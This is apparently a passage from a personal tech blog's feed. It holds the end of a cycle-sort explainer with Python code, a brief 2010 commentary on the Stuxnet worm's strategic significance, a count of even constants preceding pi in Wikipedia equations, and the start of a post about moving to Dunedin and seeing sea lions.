<code><span style="color:#c0c5ce;">[("</span><span style="color:#a3be8c;">a</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">10</span><span style="color:#c0c5ce;">), ("</span><span style="color:#a3be8c;">b</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">33</span><span style="color:#c0c5ce;">), ("</span><span style="color:#a3be8c;">c</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">18</span><span style="color:#c0c5ce;">), ("</span><span style="color:#a3be8c;">d</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">41</span><span style="color:#c0c5ce;">)]
</span></code></pre>
<p>Now, in the sorted list, we know that there will be a contiguous block of 10
"a"s, followed by a contiguous block of 33 "b"s, and so forth. We can use this
information to calculate the offset of each contiguous block up front:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">offsets</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">keys</span><span style="color:#c0c5ce;">):
d = {}
offset = </span><span style="color:#d08770;">0
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">key, occurences </span><span style="color:#b48ead;">in </span><span style="color:#c0c5ce;">keys:
d[key] = offset
offset += occurences
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">d
</span></code></pre>
<p>The <strong>key</strong> function uses this offset dictionary to look up the current index
for any element. Each time we insert an element into position, we increment the
relevant offset entry - next time we get to an element of the same type, we
will place it in the next position in the contiguous block. We also need a
small modification to the algorithm to accommodate these progressively
incrementing offsets: we start a cycle only when an element's current index is
greater than or equal to the position where it ought to be. Here's a Python
implementation:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">offsets</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">keys</span><span style="color:#c0c5ce;">):
d = {}
offset = </span><span style="color:#d08770;">0
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">key, occurences </span><span style="color:#b48ead;">in </span><span style="color:#c0c5ce;">keys:
d[key] = offset
offset += occurences
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">d
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">o</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">o[element]
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">cyclesort_general</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">keys</span><span style="color:#c0c5ce;">):
o = </span><span style="color:#bf616a;">offsets</span><span style="color:#c0c5ce;">(keys)
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i >= </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(o, l[i]):
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
tmp = l[n]
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n != i:
l[n] = last_value
last_value = tmp
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(o, last_value)
o[last_value] += </span><span style="color:#d08770;">1
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
l[n] = last_value
</span><span style="color:#b48ead;">break
</span></code></pre>
<p>This algorithm runs in <strong>O(n + m)</strong>, where <strong>n</strong> is the number of elements and
<strong>m</strong> is the number of distinct element values. In practice <strong>m</strong> is usually
small, so this is often tantamount to being <strong>O(n)</strong>.</p>
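<p>As an end-to-end check, here's the generalised algorithm run on data matching the key list above. The shuffled test input is my own, not from the Haddon paper:</p>

```python
import random

def offsets(keys):
    # Map each key to the starting offset of its contiguous block.
    d = {}
    offset = 0
    for k, occurrences in keys:
        d[k] = offset
        offset += occurrences
    return d

def key(o, element):
    return o[element]

def cyclesort_general(l, keys):
    # In-place cycle sort for data whose key frequencies are known up front.
    o = offsets(keys)
    for i in range(len(l)):
        if i >= key(o, l[i]):
            n = i
            last_value = None
            while True:
                tmp = l[n]
                if n != i:
                    l[n] = last_value
                last_value = tmp
                n = key(o, last_value)
                o[last_value] += 1
                if n == i:
                    l[n] = last_value
                    break

keys = [("a", 10), ("b", 33), ("c", 18), ("d", 41)]
l = [k for k, count in keys for _ in range(count)]
random.shuffle(l)
cyclesort_general(l, keys)
assert l == sorted(l)
```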
<h2 id="the-code">The code</h2>
<p>As usual, the code for these visualisations has been incorporated into the
<a href="https://github.com/cortesi/sortvis">sortvis project</a>. I've also added the
visualisations above to the <a href="http://sortvis.org">sortvis.org</a> website.</p>
What Stuxnet means
2010-11-15T00:00:00+00:00
2010-11-15T00:00:00+00:00
https://corte.si/posts/security/stuxnet/
<p><a href="http://www.symantec.com/connect/blogs/stuxnet-breakthrough">The last bit of evidence is now
in</a> - it appears
that the mysterious <a href="http://en.wikipedia.org/wiki/Stuxnet">Stuxnet</a> worm was
indeed aimed at Iran's nuclear capability. This means that we now know for sure
that Stuxnet was an event of great significance - the first example of a type of
sophisticated interstate warfare that we can expect to see a lot more of in
future. It neatly ties together a number of trends that we've been talking about
to clients at <a href="http://www.nullcube.com">Nullcube</a> for years:</p>
<ul>
<li><strong>The worm as a targeted delivery platform.</strong> Stuxnet spread indiscriminately,
waiting until it infected its intended target before springing into action.
This is a marvelous delivery platform with excellent deniability. When
executed with flair - using multiple previously unknown vulnerabilities,
spreading through both physical media and networks - it can be incredibly hard
to defend against. Look for a Stuxnet-like worm that exfiltrates data from
targeted systems next.</li>
<li><strong>Internet security is a national concern.</strong> There's a tendency to view the
Internet as an internationally homogeneous network. Stuxnet makes it (even
more) clear that the Internet is a domain for contest between nation states,
and that national differences in security readiness and technology populations
matter. Look for more direct government involvement in tracking and improving
the security of local networks. I suspect we'll also see the rise of national
perimeter defenses in some countries in the next few years.</li>
<li><strong>Embedded systems are a target.</strong> Embedded systems are everywhere, are often
ignored when security is considered, and are opaque, difficult to inspect, and
difficult to monitor. This is a malware nirvana. Whether they are directly or
indirectly connected to a network, embedded systems are a target. My
prediction: soon, we'll see a Stuxnet-like worm that spreads directly from
embedded system to embedded system, most likely affecting DSL modems. In fact,
we've already seen a clumsy precursor of this in <a href="http://en.wikipedia.org/wiki/Psyb0t">Psyb0t</a>, discovered at the beginning of 2009.</li>
</ul>
<p>There's a lot about this incident that we will most likely never know. We're
unlikely to find out who's behind Stuxnet (although Israel and the US seem to
be the only real possibilities). We're unlikely to find out if Stuxnet ever
repaid the immense technological capital its creators invested. But we do know
that it's a sign of things to come.</p>
Tau: is it worth switching?
2010-10-04T00:00:00+00:00
2010-10-04T00:00:00+00:00
https://corte.si/posts/maths/tau/
<p>The mailing list for my <a href="http://dunedin.linux.net.nz/Main/HomePage">local LUG</a>
recently had a small flurry of posts on <a href="http://www.tauday.com/">The Tau
Manifesto</a>, a proposal to replace the constant π with
τ, equal to 2π. Pro- and anti- camps quickly emerged, and much beer will likely
be spilt over the issue at our next meeting.</p>
<p>Disregarding for the moment any conceptual elegance or explanatory power that
Tau might have, I was interested to know if the move would really reduce
redundancy in common mathematical expressions. Let's say (rather arbitrarily)
that Tau simplifies a mathematical expression whenever π is preceded by an even
constant - that means that 2π becomes τ, and 4π becomes 2τ, and so forth. I had
a vague intuition that the majority of occurrences of π in the wild fell into
this category, which might indicate that τ is a more natural (or at least
parsimonious) constant to use. Was my hunch right? This, I felt, was something
I could quantify.</p>
<h2 id="methodology">Methodology</h2>
<p>I wrote a small script to crawl all the articles linked to from the Wikipedia
<a href="http://en.wikipedia.org/wiki/List_of_equations">List of Equations</a> page. For
each page, I extracted all mathematical expressions, and checked the LaTeX
source of each for occurrences of the symbol π. A little bit of light parsing
was then done to check if the symbol was directly preceded by an integer
constant. Finally, I rendered the LaTeX source back to images to produce the
equation tables below.</p>
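<p>The even-constant check can be sketched roughly as follows. This is an illustrative reconstruction, not the actual script: the function names and the regex are my own, and the real crawler also fetched the pages and rendered the LaTeX back to images.</p>

```python
import re

def constants_before_pi(latex: str) -> list:
    """For each occurrence of \\pi in a LaTeX expression, return the
    integer constant directly preceding it, or None if there isn't one."""
    return [
        int(m.group(1)) if m.group(1) else None
        for m in re.finditer(r"(\d+)?\s*\\pi\b", latex)
    ]

def simplified_by_tau(factor) -> bool:
    # The (rather arbitrary) rule from the text: tau simplifies an
    # expression whenever pi is preceded by an even integer constant.
    return factor is not None and factor % 2 == 0
```

<p>So the LaTeX source <code>8\pi G</code> yields a factor of 8, which counts as a win for τ, while <code>e^{i\pi}</code> yields no constant factor at all.</p>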
<p>Of course, anyone of sound judgement will disregard what follows entirely, due
to the many obvious shortcomings of this procedure and its underlying
assumptions. Readers of my blog, on the other hand, may find the results
interesting.</p>
<h2 id="results">Results</h2>
<p>I found a total of 3173 equations, of which 133 contained the symbol π. Of these
133 equations, the distribution of constant factors preceding π looked like
this:</p>
<div class="media">
<a href="taugraph.png">
<img src="taugraph.png" />
</a>
</div>
<p>I call this a straight win for Tau - the vast majority of expressions using π
(119 of 133) are preceded by even integer constants.</p>
<h2 id="equations">Equations</h2>
<p>Below are all the expressions that included π, plus the detected constant
factor. The headings point to the Wikipedia pages from which the equations were
taken.</p>
<p>If nothing else, this list is a nice reminder of the mysterious ubiquity of a
constant defined by the ratio of a circle's circumference to its diameter in all
aspects of physics and higher math.</p>
<h2><a href="http://en.wikipedia.org/wiki/Relativistic_wave_equations">Relativistic wave equations</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="1.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Sine-Gordon_equation">Sine-Gordon equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="2.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="3.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Fokker%E2%80%93Planck_equation">Fokker–Planck equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="4.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="5.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="6.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="7.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Euler%27s_equation">Euler's equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="8.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Friedmann_equations">Friedmann equations</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="9.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="10.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="11.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="12.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="13.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="14.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="15.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="16.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="17.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="18.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Vlasov_equation">Vlasov equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="19.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="20.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="21.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Screened_Poisson_equation">Screened Poisson equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="22.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="23.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="24.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="25.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="26.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Quadratic_equation">Quadratic equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="27.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="28.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Stokes-Einstein_relation">Stokes-Einstein relation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">6</td>
<td>
<img src="29.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">6</td>
<td>
<img src="30.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">6</td>
<td>
<img src="31.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Fisher_equation">Fisher equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="32.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="33.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="34.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="35.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Einstein%27s_field_equation">Einstein's field equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="36.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="37.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="38.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="39.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="40.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="41.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="42.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="43.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="44.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="45.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="46.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="47.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="48.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="49.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="50.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="51.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="52.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Sackur-Tetrode_equation">Sackur-Tetrode equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="53.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Laplace%27s_equation">Laplace's equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="54.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="55.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="56.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="57.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="58.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="59.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="60.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Cauchy-Riemann_equations">Cauchy-Riemann equations</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="61.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Cubic_equation">Cubic equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="62.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="63.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="64.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="65.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="66.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Partial_differential_equation">Partial differential equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="67.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="68.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="69.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="70.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="71.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="72.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="73.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Lane-Emden_equation">Lane-Emden equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="74.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Heat_equation">Heat equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="75.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="76.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="77.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="78.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="79.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="80.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="81.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="82.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="83.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="84.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="85.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="86.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="87.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="88.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="89.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="90.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="91.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Wave_equation">Wave equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="92.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="93.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="94.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="95.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Primitive_equations">Primitive equations</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="96.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="97.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Quintic_equation">Quintic equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="98.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="99.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="100.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="101.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="102.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Black%E2%80%93Scholes_equation">Black–Scholes equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="103.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="104.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="105.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Fredholm_integral_equation">Fredholm integral equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="106.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Poisson%27s_equation">Poisson's equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="107.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="108.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="109.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Helmholtz_Equation">Helmholtz Equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="110.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Van_der_Waals_equation">Van der Waals equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="111.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="112.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="113.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="114.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="115.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Lorentz_equation">Lorentz equation</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="116.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="117.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="118.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Maxwell%27s_equations">Maxwell's equations</a></h2>
<table>
<tr><th>constant</th> <th>expression</th></tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="119.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="120.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="121.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="122.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="123.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="124.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="125.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="126.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="127.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="128.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="129.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="130.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="131.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="132.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="133.png"/>
</td>
</tr>
</table>
Sea lions and lifestyle change
2010-09-02T00:00:00+00:00
2010-09-02T00:00:00+00:00
https://corte.si/posts/photos/sealions-and-lifestyle/
<p>About a year and a half ago, after dinner at a favourite local restaurant, and
having entered into that zone of philosophical clarity that sets in around the
dessert wine, my wife and I had the sudden simultaneous realisation that it was
time for a change. For most of our adult lives, we had lived in the suburb of
Newtown in Sydney - a hyper-urban jungle densely packed with coffee shops and
theatres, inhabited by a thronging mixture of students and bohemians with
counterculturally-correct hairdos. It was all beginning to seem a bit tired and
same-ish. We needed more time and more space. We needed to get back to the
essentials of life.</p>
<p>Four weeks later our furniture was in a shipping container en-route to Dunedin,
a small university town near the southern tip of New Zealand. We decided to
work together from home, keeping our schedules flexible to make time for walks,
reading, cooking, and (more recently) spending time with our son. It was a huge
risk - it was quite possible that the isolation would impose a punishing work
travel regime on me, or put a crimp in my wife's very specialised career in
linguistics. It took enterprise, determination, and no small amount of
possibly-foolish optimism, but it's all worked out. Our leap of faith has
turned out to be one of the best decisions we've ever made. Dunedin is a
breathtakingly beautiful place to live - I still can't quite believe that I can
get up from my desk, and within 20 minutes be on a deserted beach littered with
lazy sea lions basking in the winter sun.</p>
<p>My advice to you is this: when your life begins to seem a bit stuffy and
constricted, when you begin to feel you've lost sight of something more
fundamental and get the urge to refactor - <em>just do it</em>. There has never been a
better time in history for people who choose to march to a different drum.</p>
<p>To prove what a lucky fellow I am, here are two photos from my walk yesterday
morning - click to view in a lightbox.</p>
<div class="media">
<a href="male-full.jpg">
<img src="male.jpg" />
</a>
</div>
<p>It's not clear from the picture, but this is a massive New Zealand Sea Lion
bull - about 400 kilograms of apparently boneless muscle and blubber.</p>
<div class="media">
<a href="female-full.jpg">
<img src="female.jpg" />
</a>
</div>
<p>It's hard to believe that this sleek female is the same species as the dumpy,
snub-nosed chap above. New Zealand Sea Lions are the rarest species of sea lion
